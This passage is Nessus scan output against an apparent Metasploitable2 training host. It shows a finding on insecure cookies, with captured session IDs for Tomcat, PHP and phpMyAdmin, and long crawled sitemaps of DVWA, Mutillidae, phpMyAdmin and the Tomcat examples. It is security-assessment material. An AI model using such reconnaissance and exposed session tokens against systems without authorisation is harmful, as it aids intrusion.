Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : security
Path : /
Value : high
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :

85602 - Web Application Cookies Not Marked Secure
-
Synopsis
HTTP session cookies might be transmitted in cleartext.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, there are instances where the application is running over unencrypted HTTP or the cookies are not marked 'secure', meaning the browser could send them back over an unencrypted link under certain circumstances. As a result, it may be possible for a remote attacker to intercept these cookies.

Note that this plugin detects all general cookies missing the 'secure'
cookie flag, whereas plugin 49218 (Web Application Session Cookies Not Marked Secure) will only detect session cookies from an authenticated session missing the secure cookie flag.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If possible, ensure all communication occurs over an encrypted channel and add the 'secure' attribute to all session cookies or any cookies containing sensitive data.
Risk Factor
None
References
XREF CWE:522
XREF CWE:718
XREF CWE:724
XREF CWE:928
XREF CWE:930
Plugin Information
Published: 2015/08/24, Modified: 2015/08/24
Plugin Output

tcp/8180/www


The following cookies do not set the secure cookie flag :

Name : JSESSIONID
Path : /admin
Value : 699B572747CD478A3F4F04BB62455889
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : pma_theme
Path : /phpMyAdmin/
Value : original
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_fontsize
Path : /phpMyAdmin/
Value : 82%25
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : JSESSIONID
Path : /jsp-examples
Value : E6A8CD9B75B21367575E3EABBC982256
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : PHPSESSID
Path : /
Value : fa3735aa13431fbdd0ca536ca5b09aef
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : phpMyAdmin
Path : /phpMyAdmin/
Value : 04942ffae0ebce5f92b60b1b678205fb960d2050
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_lang
Path : /phpMyAdmin/
Value : en-utf-8
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_charset
Path : /phpMyAdmin/
Value : utf-8
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : JSESSIONID
Path : /servlets-examples
Value : AF7481CB01B7F78DFE04CCC70B5470C0
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : security
Path : /
Value : high
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :

91815 - Web Application Sitemap
-
Synopsis
The remote web server hosts linkable content that can be crawled by Nessus.
Description
The remote web server contains linkable content that can be used to gather information about a target.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2016/06/24, Modified: 2016/06/24
Plugin Output

tcp/80/www


The following sitemap was created from crawling linkable content on the target host :

- http://metasploitable2.sicurform/
- http://metasploitable2.sicurform/dav/
- http://metasploitable2.sicurform/dvwa/dvwa/
- http://metasploitable2.sicurform/dvwa/dvwa/css/
- http://metasploitable2.sicurform/dvwa/dvwa/css/help.css
- http://metasploitable2.sicurform/dvwa/dvwa/css/login.css
- http://metasploitable2.sicurform/dvwa/dvwa/css/main.css
- http://metasploitable2.sicurform/dvwa/dvwa/css/source.css
- http://metasploitable2.sicurform/dvwa/dvwa/images/
- http://metasploitable2.sicurform/dvwa/dvwa/images/RandomStorm.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/dollar.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/lock.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/login_logo.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/logo.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/spanner.png
- http://metasploitable2.sicurform/dvwa/dvwa/images/warning.png
- http://metasploitable2.sicurform/dvwa/dvwa/includes/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/MySQL.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPage.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPhpIds.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/js/
- http://metasploitable2.sicurform/dvwa/dvwa/js/dvwaPage.js
- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/documentation/
- http://metasploitable2.sicurform/mutillidae/documentation/Mutillidae-Test-Scripts.txt
- http://metasploitable2.sicurform/mutillidae/documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php
- http://metasploitable2.sicurform/mutillidae/documentation/mutillidae-installation-on-xampp-win7.pdf
- http://metasploitable2.sicurform/mutillidae/documentation/sqlmap-help.txt
- http://metasploitable2.sicurform/mutillidae/documentation/vulnerabilities.php
- http://metasploitable2.sicurform/mutillidae/favicon.ico
- http://metasploitable2.sicurform/mutillidae/framer.html
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/mutillidae/set-up-database.php
- http://metasploitable2.sicurform/mutillidae/styles/
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/ddsmoothmenu-v.css
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/ddsmoothmenu.css
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/readme.txt
- http://metasploitable2.sicurform/mutillidae/styles/global-styles.css
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/favicon.ico
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/phpMyAdmin/phpmyadmin.css.php
- http://metasploitable2.sicurform/phpMyAdmin/print.css
- http://metasploitable2.sicurform/test/
- http://metasploitable2.sicurform/test/testoutput/
- http://metasploitable2.sicurform/test/testoutput/ESAPI_logging_file_test
- http://metasploitable2.sicurform/twiki/
- http://metasploitable2.sicurform/twiki/TWikiHistory.html
- http://metasploitable2.sicurform/twiki/bin/oops
- http://metasploitable2.sicurform/twiki/bin/oops/Main
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour/company
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome
- http://metasploitable2.sicurform/twiki/license.txt
- http://metasploitable2.sicurform/twiki/readme.txt

Attached is a copy of the sitemap file.

91815 - Web Application Sitemap
-
Synopsis
The remote web server hosts linkable content that can be crawled by Nessus.
Description
The remote web server contains linkable content that can be used to gather information about a target.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2016/06/24, Modified: 2016/06/24
Plugin Output

tcp/8180/www


The following sitemap was created from crawling linkable content on the target host :

- http://metasploitable2.sicurform:8180/
- http://metasploitable2.sicurform:8180/RELEASE-NOTES.txt
- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/admin/j_security_check
- http://metasploitable2.sicurform:8180/jsp-examples/
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entries.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entry.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/TableBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/calendar.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/CheckTest.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/cresult.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/ColorGameBean.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/clr.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/er.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/fwd.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/inc.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/index.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/FooBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/ShuffleSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/TileSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/svgexample.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.jspx
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/EchoAttributesTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/coda.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/prelude.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/BookBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/FindBookSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/RepeatSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/displayProducts.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/helloWorld.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jts.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/servletToJsp.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/DummyCart.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/crt.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/howto.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/notes.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp.html
- http://metasploitable2.sicurform:8180/servlets-examples/
- http://metasploitable2.sicurform:8180/servlets-examples/cookies.html
- http://metasploitable2.sicurform:8180/servlets-examples/helloworld.html
- http://metasploitable2.sicurform:8180/servlets-examples/index.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqheaders.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqinfo.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqparams.html
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/CookieExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/HelloWorldExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestHeaderExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestInfoExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestParamExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/SessionExample
- http://metasploitable2.sicurform:8180/servlets-examples/sessions.html
- http://metasploitable2.sicurform:8180/tomcat-docs/
- http://metasploitable2.sicurform:8180/tomcat-docs/RELEASE-NOTES.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/build.xml.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/build.xml.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/web.xml.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/sample/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/sample/sample.war
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/web.xml.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/requestProcess/requestProcess.pdf
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/startup/serverStartup.pdf
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/startup/serverStartup.txt
- http://metasploitable2.sicurform:8180/tomcat-docs/balancer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/build.xml
- http://metasploitable2.sicurform:8180/tomcat-docs/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/resources/gjdochtml-clean-color1.css
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/resources/gjdochtml-clean-layout.css
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/balancer-howto.html
